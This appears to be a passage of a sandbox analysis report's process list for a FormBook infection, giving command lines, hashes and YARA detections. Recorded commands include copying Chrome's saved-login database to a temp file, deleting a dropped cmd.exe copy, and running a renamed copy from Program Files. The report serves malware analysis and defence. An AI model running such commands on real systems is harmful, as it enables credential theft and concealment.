                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:20:12:44
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:23
                                                                                                Start time:20:12:57
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:20:12:58
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:29
                                                                                                Start time:20:13:21
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                Imagebase:0x1080000
                                                                                                File size:61952 bytes
                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                General

                                                                                                Target ID:30
                                                                                                Start time:20:13:27
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:/c del "C:\Windows\SysWOW64\cmd.exe"
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Target ID:31
                                                                                                Start time:20:13:28
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Target ID:40
                                                                                                Start time:20:15:29
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Target ID:41
                                                                                                Start time:20:15:31
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Target ID:46
                                                                                                Start time:20:15:53
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                Imagebase:0x3e0000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Target ID:47
                                                                                                Start time:20:15:55
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Disassembly

                                                                                                No disassembly